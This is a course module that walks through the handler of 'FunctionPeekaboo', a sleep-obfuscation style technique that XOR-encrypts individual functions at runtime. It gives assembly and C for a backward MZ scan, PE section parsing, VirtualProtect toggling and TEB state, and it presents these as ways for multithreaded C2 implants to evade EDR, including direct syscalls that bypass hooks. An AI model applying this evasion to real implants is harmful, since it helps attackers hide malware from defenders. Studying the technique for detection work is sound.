Module 6: The Handler & XOR Engine
The ~380-byte core routine that performs memory permission changes, PE header parsing, and byte-level XOR encryption/decryption.
Module Objective
Deep dive into the handler — the shared routine called by every prologue and epilogue stub. Understand its PE header validation logic, .funcmeta section traversal, VirtualProtect permission transitions (RX → RW → RX), byte-level XOR implementation, and the TEB UserReserved field usage for per-thread state management via the GS segment register.
1. Handler Overview
The handler is a single shared routine (~380 bytes) called by every prologue and epilogue stub. It receives two arguments:
| Parameter | Register | Description |
|---|---|---|
| Function Pointer | RCX | Pointer to the function body that needs to be encrypted or decrypted |
| Operation Flag | RDX | 0 = decrypt (called from prologue), 1 = encrypt (called from epilogue) |
The handler’s job is to:
Handler Steps
- Find the PE image base by walking backward from the handler’s own address to find the MZ header
- Parse PE headers to locate the .funcmeta section
- Search .funcmeta entries to find the metadata for the target function (matching by RVA)
- Check the IsEncrypted flag to determine if the requested operation is valid
- Call VirtualProtect to change the function’s memory to RW (writable)
- XOR the function body bytes with the stored key
- Call VirtualProtect to restore RX (executable) permissions
- Update the IsEncrypted flag in .funcmeta
- Update TEB UserReserved fields to track the currently active function
2. Finding the Image Base
The handler needs to find the PE image base to locate the section headers. Since ASLR randomizes the load address, the handler uses a backward-scanning technique:
x86-64 Assembly
; Find image base by scanning backward from current address
; PE images are mapped at 64KB-aligned addresses (0x10000)
find_image_base:
    ; Start from the handler's own address (RIP-relative, so position-independent)
    lea rax, [rel find_image_base]
    and rax, 0xFFFFFFFFFFFF0000 ; Align down to 64KB boundary
.scan_loop:
    ; Check for MZ signature at this address
    cmp word ptr [rax], 0x5A4D ; "MZ" in little-endian
    jne .next_candidate
    ; Validate: check PE signature
    mov ecx, dword ptr [rax + 0x3C] ; e_lfanew (offset to PE header)
    cmp dword ptr [rax + rcx], 0x4550 ; "PE\0\0"
    je .found_pe
.next_candidate:
    ; No MZ here, or MZ without a PE signature: step back before retrying,
    ; otherwise the same address would be re-tested forever
    sub rax, 0x10000 ; Move back 64KB
    jmp .scan_loop
.found_pe:
    ; Valid PE found - RAX = ImageBase
Why Not Use GetModuleHandle?
Calling GetModuleHandle(NULL) would be simpler, but it requires importing the function from kernel32.dll. The handler is designed to be import-free where possible, reducing the API footprint visible to EDR. The backward MZ scan is a well-known technique used in shellcode and reflective loaders — it works because the Windows PE loader maps executables at 64KB-aligned boundaries.
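The scan can also be modeled in portable C over an ordinary byte buffer, which makes the alignment and validation steps easy to check in isolation. This is a minimal sketch, not the handler's code: the helper name find_image_base_offset, the rd16/rd32 readers, and the explicit bounds checks are assumptions added for illustration, and offsets into the buffer stand in for real addresses.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ALLOC_GRANULARITY 0x10000u /* 64KB step, as in the assembly listing */

/* Read little-endian integers without assuming alignment. */
static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns the offset of the image base inside mem,
 * or (size_t)-1 if no valid MZ/PE pair exists at or below start. */
static size_t find_image_base_offset(const uint8_t *mem, size_t len, size_t start) {
    assert(mem != NULL && start < len);
    size_t off = start & ~(size_t)(ALLOC_GRANULARITY - 1); /* align down to 64KB */
    for (;;) {
        /* The DOS header must fit and begin with "MZ". */
        if (off + 0x40 <= len && rd16(mem + off) == 0x5A4D) {
            uint32_t e_lfanew = rd32(mem + off + 0x3C);
            /* The PE signature must lie inside the buffer and read "PE\0\0". */
            if (e_lfanew <= len - off - 4 &&
                rd32(mem + off + e_lfanew) == 0x00004550u) {
                return off;
            }
        }
        if (off < ALLOC_GRANULARITY)
            return (size_t)-1;          /* reached the start of the buffer */
        off -= ALLOC_GRANULARITY;       /* step back one 64KB boundary */
    }
}
```

A candidate that carries "MZ" but no PE signature is skipped rather than re-tested, and the walk stops at the start of the buffer instead of reading below it.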
3. PE Header Traversal
Once the image base is found, the handler parses the PE headers to locate the .funcmeta section:
x86-64 Assembly
; Navigate PE headers to find .funcmeta section
; RAX = ImageBase (from step 2)
parse_pe:
    mov ecx, [rax + 0x3C] ; e_lfanew
    lea rdx, [rax + rcx] ; RDX = PE signature address
    ; PE signature at [RDX+0] = "PE\0\0"
    ; COFF header at [RDX+4] (20 bytes)
    ; Optional hdr at [RDX+24] (variable size)
    ; Get number of sections
    movzx ecx, word ptr [rdx + 6] ; NumberOfSections
    ; Get size of optional header
    movzx r8d, word ptr [rdx + 20] ; SizeOfOptionalHeader
    ; First section header starts after optional header
    lea r9, [rdx + 24 + r8] ; R9 = first IMAGE_SECTION_HEADER
    ; Iterate section headers (40 bytes each)
.section_loop:
    ; The section name field is 8 bytes at [R9+0], so only the first
    ; eight characters of ".funcmeta" (".funcmet") are compared
    cmp dword ptr [r9], 0x6E75662E ; ".fun" in little-endian
    jne .next_section
    cmp dword ptr [r9 + 4], 0x74656D63 ; "cmet" in little-endian
    je .found_funcmeta
.next_section:
    add r9, 40 ; sizeof(IMAGE_SECTION_HEADER)
    dec ecx
    jnz .section_loop
    ret ; .funcmeta not found (shouldn't happen)
.found_funcmeta:
    ; R9 = pointer to .funcmeta section header
    mov ecx, [r9 + 12] ; VirtualAddress (RVA)
    lea rsi, [rax + rcx] ; RSI = .funcmeta data in memory
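The same header walk can be expressed in portable C against a byte buffer, using only the field offsets from the listing (e_lfanew at 0x3C, NumberOfSections at +6, SizeOfOptionalHeader at +20, 40-byte section headers with VirtualAddress at +12). This is a sketch under stated assumptions: find_section_rva and the rd16/rd32 readers are hypothetical names, and the bounds checks are additions that the assembly does not perform.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: look up a section by its 8-byte name field.
 * Returns the section's VirtualAddress (RVA), or 0 if absent or malformed. */
static uint32_t find_section_rva(const uint8_t *img, size_t len, const char *name) {
    assert(img != NULL && name != NULL);

    uint8_t want[8] = {0};                  /* name field is NUL-padded to 8 bytes */
    size_t n = strlen(name);
    memcpy(want, name, n < 8 ? n : 8);      /* longer names are cut to 8 bytes */

    if (len < 0x40 || rd16(img) != 0x5A4D)  /* "MZ" */
        return 0;
    size_t pe = rd32(img + 0x3C);           /* e_lfanew */
    if (pe > len || len - pe < 24 || rd32(img + pe) != 0x00004550u)
        return 0;                           /* missing "PE\0\0" */

    uint16_t nsect   = rd16(img + pe + 6);  /* NumberOfSections */
    uint16_t optsize = rd16(img + pe + 20); /* SizeOfOptionalHeader */
    size_t sec = pe + 24 + optsize;         /* first IMAGE_SECTION_HEADER */

    for (uint16_t i = 0; i < nsect; i++, sec += 40) {
        if (sec > len || len - sec < 40)
            return 0;                       /* section table runs past the buffer */
        if (memcmp(img + sec, want, 8) == 0)
            return rd32(img + sec + 12);    /* VirtualAddress */
    }
    return 0;
}
```

Comparing all eight name bytes at once is equivalent to the two DWORD comparisons in the assembly: read as little-endian DWORDs, ".fun" is 0x6E75662E and "cmet" is 0x74656D63.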
4. .funcmeta Entry Lookup
The .funcmeta section is a flat array of entries. The handler searches for the entry matching the target function (whose address was passed in RCX by the stub):
x86-64 Assembly
; Search .funcmeta for the target function
; RSI = .funcmeta data pointer
; RCX = target function body address (from stub); the listings in steps 2
;       and 3 overwrite ECX, so the argument must be saved on entry and
;       reloaded before this point
; RAX = ImageBase
search_funcmeta:
    ; Convert target address to RVA
    sub rcx, rax ; RCX = function RVA
.entry_loop:
    ; Each entry: [4B RVA][4B Size][1B Key][1B IsEncrypted][2B Pad]
    mov edi, [rsi] ; Entry's FunctionRVA
    test edi, edi ; NULL terminator?
    jz .not_found ; Shouldn't happen for valid calls
    cmp edi, ecx ; Compare with target RVA
    je .found_entry
    add rsi, 12 ; Next entry (12 bytes per entry)
    jmp .entry_loop
.found_entry:
    ; RSI points to the matching entry
    ; [RSI+0] = FunctionRVA (DWORD)
    ; [RSI+4] = FunctionSize (DWORD)
    ; [RSI+8] = XorKey (BYTE)
    ; [RSI+9] = IsEncrypted (BYTE)
    ; [RSI+10] = Reserved (WORD)
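The 12-byte entry layout and the terminator-based search map directly onto a C struct and a linear scan. The sketch below is illustrative only: the type name func_meta_entry, its field names, and the max_entries bound (a guard against a missing terminator) are assumptions, not part of the original implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirrors the entry layout from the listing; names are illustrative. */
typedef struct {
    uint32_t function_rva;   /* +0  */
    uint32_t function_size;  /* +4  */
    uint8_t  xor_key;        /* +8  */
    uint8_t  is_encrypted;   /* +9  */
    uint16_t reserved;       /* +10 */
} func_meta_entry;

/* The assembly advances by 12 bytes per entry, so the struct must match. */
_Static_assert(sizeof(func_meta_entry) == 12, "entry must be 12 bytes");
_Static_assert(offsetof(func_meta_entry, xor_key) == 8, "key at +8");
_Static_assert(offsetof(func_meta_entry, is_encrypted) == 9, "flag at +9");

/* Linear search; an entry whose RVA is 0 terminates the table.
 * Returns NULL when no entry matches target_rva. */
static func_meta_entry *find_entry(func_meta_entry *table, size_t max_entries,
                                   uint32_t target_rva) {
    assert(table != NULL);
    for (size_t i = 0; i < max_entries && table[i].function_rva != 0; i++) {
        if (table[i].function_rva == target_rva)
            return &table[i];
    }
    return NULL;
}
```

Returning NULL for a missing entry gives the caller an explicit failure path, which corresponds to the .not_found branch in the assembly.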
5. VirtualProtect Permission Changes
Before XOR-ing the function body, the handler must change memory permissions. The function’s .text section is normally PAGE_EXECUTE_READ (RX), which prevents writing. The handler toggles to PAGE_READWRITE (RW) for the XOR operation, then back to PAGE_EXECUTE_READ after:
C (Pseudocode)
// Permission change sequence in the handler
void handler(void* func_body, int operation) {
    FUNC_META_ENTRY* entry = find_entry(func_body);
    DWORD oldProtect;
    // Step 1: Change to RW (writable, non-executable)
    if (!VirtualProtect(func_body,
                        entry->FunctionSize,
                        PAGE_READWRITE, // 0x04
                        &oldProtect))   // Receives previous protection (PAGE_EXECUTE_READ)
        return; // Could not make the range writable; leave the bytes untouched
    // Step 2: XOR the function body
    xor_memory(func_body, entry->FunctionSize, entry->XorKey);
    // Step 3: Restore to RX (executable, non-writable)
    VirtualProtect(func_body,
                   entry->FunctionSize,
                   PAGE_EXECUTE_READ, // 0x20
                   &oldProtect);
    // Step 4: Update state
    entry->IsEncrypted = !entry->IsEncrypted;
}
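VirtualProtect works at page granularity: the change applies to every page that contains at least one byte of the requested range, so a small function that straddles a page boundary affects two pages, and any other code on those pages loses execute permission for the duration. The arithmetic can be sketched as follows; page_span and pages_covering are hypothetical names, and the 4KB page size in the usage note is an assumption.

```c
#include <assert.h>
#include <stdint.h>

/* Pages touched by the byte range [addr, addr + size). */
typedef struct {
    uint64_t first_page;  /* base address of the first affected page */
    uint64_t last_page;   /* base address of the last affected page */
    uint64_t page_count;  /* number of affected pages */
} page_span;

/* Hypothetical helper: page_size must be a power of two and size nonzero. */
static page_span pages_covering(uint64_t addr, uint64_t size, uint64_t page_size) {
    assert(size > 0);
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);

    page_span s;
    s.first_page = addr & ~(page_size - 1);              /* round start down */
    s.last_page  = (addr + size - 1) & ~(page_size - 1); /* page of last byte */
    s.page_count = (s.last_page - s.first_page) / page_size + 1;
    return s;
}
```

With 4KB pages, a 0x40-byte function at an address ending in 0xFF0 spans two pages, while a 0x80-byte function at an address ending in 0x100 stays within one.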
VirtualProtect is the Main Detection Surface
VirtualProtect is a well-monitored API. EDR products hook it to detect memory permission changes (a classic indicator of shellcode injection and sleep obfuscation). The per-function granularity of FunctionPeekaboo means many small VirtualProtect calls rather than one large one, which could be either harder or easier to detect depending on the EDR’s heuristics. An advanced implementation might use NtProtectVirtualMemory syscalls directly to bypass user-mode hooks.
6. The XOR Engine
The actual encryption/decryption is a simple byte-level XOR loop. Since XOR is its own inverse, the same operation encrypts and decrypts:
x86-64 Assembly
; XOR engine - encrypt or decrypt function body
; RDI = pointer to function body
; ECX = function body size (bytes)
; AL = XOR key
xor_engine:
    test ecx, ecx
    jz .xor_done
.xor_loop:
    xor byte ptr [rdi], al ; XOR single byte
    inc rdi ; Next byte
    dec ecx ; Decrement counter
    jnz .xor_loop
.xor_done:
    ret
This is intentionally simple. The loop processes one byte at a time, which is not the fastest possible implementation but is the smallest and most reliable. Optimization options include:
| Optimization | Approach | Trade-off |
|---|---|---|
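| 8-byte blocks | Broadcast the key byte into all 8 bytes of a QWORD, XOR a QWORD at a time | Roughly 8x fewer loop iterations, slightly more code, leftover tail bytes need separate handling |
| SSE/AVX | Use PXOR (16-byte), VPXOR (32-byte), or AVX-512 VPXORD (64-byte) vector XOR | Far fewer iterations, much more code, vector register save and restore overhead |
| LODSB/STOSB variant | Load, XOR, and store each byte with string instructions | Compact, but no string XOR instruction exists to pair with REP, so it remains a byte loop |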
Why Byte-by-Byte?
Function bodies vary in size and are not guaranteed to be aligned to any particular boundary. A byte-by-byte loop handles all sizes correctly without alignment checks. For typical function sizes (hundreds to low thousands of bytes), the performance difference between byte-by-byte and QWORD XOR is microseconds — negligible compared to the VirtualProtect syscall overhead.
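To make the trade-off concrete, the sketch below places the byte loop next to the 8-byte block variant from the table. Both function names are illustrative. The block variant broadcasts the key into a QWORD, processes full 8-byte groups, and finishes the remaining 0 to 7 bytes one at a time, so it needs no alignment assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Byte-at-a-time XOR, equivalent to the assembly loop. */
static void xor_bytes(uint8_t *buf, size_t len, uint8_t key) {
    assert(buf != NULL || len == 0);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* 8-byte variant: same result, fewer loop iterations. */
static void xor_qwords(uint8_t *buf, size_t len, uint8_t key) {
    assert(buf != NULL || len == 0);
    /* Multiplying by 0x0101...01 copies the key into every byte lane. */
    const uint64_t wide = 0x0101010101010101ULL * key;
    size_t i = 0;
    for (; i + 8 <= len; i += 8) {
        uint64_t v;
        memcpy(&v, buf + i, 8);   /* memcpy sidesteps unaligned-access issues */
        v ^= wide;
        memcpy(buf + i, &v, 8);
    }
    for (; i < len; i++)          /* tail: 0 to 7 leftover bytes */
        buf[i] ^= key;
}
```

Because every byte lane holds the same key, the result does not depend on endianness, and applying either function twice with the same key restores the original bytes.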
7. TEB UserReserved Fields
The Thread Environment Block (TEB) contains a UserReserved array that is set aside for application use, which makes it a convenient place for per-thread state. In the publicly documented x86-64 TEB layout, UserReserved is an array of five ULONG elements (20 bytes) starting at offset 0xE8. A 64-bit pointer spans two elements, so the listing below treats the array as 8-byte slots at 0xE8 and 0xF0, with the final 4-byte element at 0xF8:
x86-64 Assembly
; Access TEB via GS segment register (x86-64 Windows)
; GS:[0x30] = pointer to TEB itself (self-reference)
; GS:[0xE8] = UserReserved[0..1] (first 8-byte slot)
; GS:[0xF0] = UserReserved[2..3] (second 8-byte slot)
; GS:[0xF8] = UserReserved[4] (last element, 4 bytes)
; FunctionPeekaboo uses these for per-thread tracking:
; slot at 0xE8 = pointer to currently active (decrypted) function body
; slot at 0xF0 = operation flags / recursion counter
; In the handler - update active function tracking
; (the two stores are alternatives, selected by the operation flag):
update_teb:
    ; On decrypt (prologue): store function pointer
    mov qword ptr gs:[0xE8], rcx ; Store active function ptr
    ; On encrypt (epilogue): clear active function pointer
    mov qword ptr gs:[0xE8], 0 ; No function currently active
Why TEB and Not a Global Variable?
A global variable would work for single-threaded implants, but most C2 implants are multithreaded (handling multiple tasks concurrently). The TEB is per-thread, so each thread can independently track which function it is currently executing. This prevents thread A’s function state from interfering with thread B’s function state.
8. GS Segment Register on Windows x64
On x86-64 Windows, the GS segment base points to the TEB of the current thread while it runs in user mode. The kernel updates the GS base whenever it switches threads, so GS:[offset] always refers to the current thread’s TEB:
| GS Offset | TEB Field | Purpose |
|---|---|---|
| GS:[0x00] | ExceptionList | SEH chain |
| GS:[0x08] | StackBase | Highest address of the stack |
| GS:[0x10] | StackLimit | Lowest committed address of the stack |
| GS:[0x30] | Self | TEB self-pointer |
| GS:[0x40] | ClientId.UniqueProcess | PID |
| GS:[0x48] | ClientId.UniqueThread | TID |
| GS:[0x60] | ProcessEnvironmentBlock | PEB pointer |
| GS:[0xE8] | UserReserved[0..1] | FunctionPeekaboo: active function ptr |
| GS:[0xF0] | UserReserved[2..3] | FunctionPeekaboo: flags |
| GS:[0xF8] | UserReserved[4] | FunctionPeekaboo: reserved |
GS vs FS
On x86-64 Windows, GS points to the TEB. On x86-32, it was FS. This is a common source of confusion. FunctionPeekaboo targets x86-64 and uses GS exclusively. On Linux, the segment register usage is reversed (FS for TLS on x86-64), but FunctionPeekaboo is Windows-specific.
9. Complete Handler Pseudocode
C (Pseudocode)
// Complete handler logic (~380 bytes compiled)
void __fastcall handler(void* func_body_ptr, uint64_t operation) {
    // 1. Find image base (backward MZ scan)
    uintptr_t base = find_image_base();
    // 2. Parse PE headers to find .funcmeta
    IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
    IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
    IMAGE_SECTION_HEADER* sections = IMAGE_FIRST_SECTION(nt);
    FUNC_META_ENTRY* meta = NULL;
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        // Name is an 8-byte field, so only ".funcmet" is compared
        if (memcmp(sections[i].Name, ".funcmeta", 8) == 0) {
            meta = (FUNC_META_ENTRY*)(base + sections[i].VirtualAddress);
            break;
        }
    }
    if (meta == NULL)
        return; // .funcmeta section not found
    // 3. Find matching entry
    uintptr_t func_rva = (uintptr_t)func_body_ptr - base;
    while (meta->FunctionRVA != 0) {
        if (meta->FunctionRVA == func_rva)
            break;
        meta++;
    }
    if (meta->FunctionRVA == 0)
        return; // Reached the terminator: no entry for this function
    // 4. Validate operation
    if (operation == 0 && !meta->IsEncrypted)
        return; // Already decrypted, skip
    if (operation == 1 && meta->IsEncrypted)
        return; // Already encrypted, skip
    // 5. Change permissions to RW
    DWORD old;
    if (!VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_READWRITE, &old))
        return; // Could not make the range writable
    // 6. XOR the function body
    uint8_t* bytes = (uint8_t*)func_body_ptr;
    for (DWORD i = 0; i < meta->FunctionSize; i++) {
        bytes[i] ^= meta->XorKey;
    }
    // 7. Restore permissions to RX
    VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_EXECUTE_READ, &old);
    // 8. Update metadata
    meta->IsEncrypted = !meta->IsEncrypted;
    // 9. Update TEB tracking
    // UserReserved starts at TEB offset 0xE8 in the documented x64 layout
    if (operation == 0) { // decrypt
        __writegsqword(0xE8, (uint64_t)func_body_ptr);
    } else { // encrypt
        __writegsqword(0xE8, 0);
    }
}
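The validation in step 4 is what makes repeated requests harmless: a decrypt request on an already decrypted function, or an encrypt request on an already encrypted one, returns before any bytes change. The sketch below models only that state machine on an ordinary buffer, with no permission changes or TEB writes; meta_entry, toggle, and the OP_ constants are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative stand-in for a .funcmeta entry. */
typedef struct {
    uint32_t rva;
    uint32_t size;
    uint8_t  key;
    uint8_t  is_encrypted;
    uint16_t pad;
} meta_entry;

enum { OP_DECRYPT = 0, OP_ENCRYPT = 1 };

/* Applies the requested operation if it is valid for the current state.
 * Returns 1 if the bytes were toggled, 0 if the request was a no-op. */
static int toggle(uint8_t *image, meta_entry *e, int op) {
    assert(image != NULL && e != NULL);
    if (op == OP_DECRYPT && !e->is_encrypted)
        return 0;                       /* already decrypted */
    if (op == OP_ENCRYPT && e->is_encrypted)
        return 0;                       /* already encrypted */
    for (uint32_t i = 0; i < e->size; i++)
        image[e->rva + i] ^= e->key;    /* XOR is its own inverse */
    e->is_encrypted = !e->is_encrypted; /* flip state only after the XOR */
    return 1;
}
```

Without the flag check, two consecutive encrypt requests would XOR the body twice and leave it in plaintext while the caller believes it is protected.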
10. Handler as Position-Independent Code
The handler itself must be position-independent: it cannot contain absolute addresses, and it should avoid adding imports of its own. The only external dependency is VirtualProtect from kernel32.dll, which can be resolved via:
VirtualProtect Resolution Options
- PEB walking: Traverse PEB → Ldr → InMemoryOrderModuleList to find kernel32.dll, then parse its export table for VirtualProtect
- IAT reuse: If the main binary already imports VirtualProtect, use the IAT entry (already resolved by the loader)
- Hardcoded syscall: Call NtProtectVirtualMemory with the system call number directly, bypassing kernel32/ntdll entirely
The PoC uses the IAT approach for simplicity. A production implementation (like Nighthawk) would likely use direct syscalls.
Knowledge Check
Q1: How does the handler find the PE image base at runtime?
Q2: Why does FunctionPeekaboo use TEB UserReserved fields instead of global variables?
Q3: What is the primary detection surface of the handler?